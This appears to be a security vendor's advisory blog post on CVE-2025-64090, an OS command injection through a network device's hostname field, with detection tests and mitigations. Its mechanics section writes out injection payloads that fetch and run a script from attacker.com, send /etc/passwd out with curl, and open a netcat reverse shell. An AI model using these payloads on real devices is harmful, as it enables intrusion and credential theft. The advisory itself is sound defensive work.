CVE CRITICAL January 9, 2026 · 8 min read

CVE-2025-64090: Command Injection via Device Hostname Field Enables Full System Compromise

Authenticated attackers can execute arbitrary OS commands by injecting shell metacharacters into the device hostname field. CVSS 10.0. A common vulnerability class in network devices and embedded systems that consistently yields critical impact.


CVSS 10.0 — CRITICAL
FieldDetail
CVE IDCVE-2025-64090
SeverityCRITICAL (CVSS 3.1: 10.0)
Vulnerability TypeOS Command Injection (CWE-78)
PublishedJanuary 9, 2026
Authentication RequiredYes (low privilege)
Attack VectorNetwork

What Is CVE-2025-64090?

CVE-2025-64090 is a command injection vulnerability where the device hostname configuration field is passed unsanitized to an underlying shell command. By inserting shell metacharacters (;, |, `, $()) into the hostname value, authenticated attackers can break out of the intended command context and execute arbitrary OS commands with the privileges of the device's management process — typically root.

This vulnerability class is endemic in network devices, IoT hardware, routers, firewalls, and embedded Linux systems where web-based management interfaces build shell commands from user-supplied configuration values without proper sanitization.

⚠ Low Barrier to Full Compromise

Any authenticated user — including low-privilege accounts — can achieve root-level command execution. In environments where default or weak credentials exist, this becomes effectively unauthenticated exploitation.

Command Injection Mechanics

# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)

# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id > /var/www/html/pwned.txt)

# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh

Affected Versions

Consult the vendor advisory for specific hardware models and firmware versions. Network devices with web-based management interfaces that expose hostname configuration are the primary risk surface.

Detection Methods

Testing for Hostname Injection

# Manual test: submit hostname with command injection payload
# Use time-delay to confirm blind injection
POST /admin/network/hostname
hostname=test%3Bsleep%205

# If response delays ~5 seconds: vulnerable

# Out-of-band confirmation:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 KENSAI Detection: KENSAI's device security scanner tests management interface fields including hostname, DNS, NTP, and SNMP configuration for OS command injection. CVE-2025-64090 patterns are included in network device assessment profiles.

Mitigation Steps

  1. Apply vendor firmware update immediately.
  2. Input validation: Hostname fields should only accept alphanumeric characters and hyphens (RFC 952/1123 compliant).
  3. Use safe APIs: Replace shell command construction with system calls that accept argument arrays (no shell interpolation).
  4. Restrict management interface: Limit access to management UI to trusted IP ranges via firewall rules.
  5. Change default credentials: Ensure all management accounts use strong, unique passwords.
  6. Network segmentation: Isolate management interfaces from user-accessible networks.

Command Injection in Your Network Devices?

KENSAI scans network devices and management interfaces for command injection vulnerabilities including CVE-2025-64090. Identify vulnerable devices before attackers gain a foothold.

Scan Network Devices Free

Published by the KENSAI Security Research Team · More CVE Analysis

Related Articles

Frankrijk meldt daling ransomware dankzij NIS2 CORS Misconfiguration Vulnerability: Complete Guide to Detection and Prevention France ANSSI Reports Ransomware Drop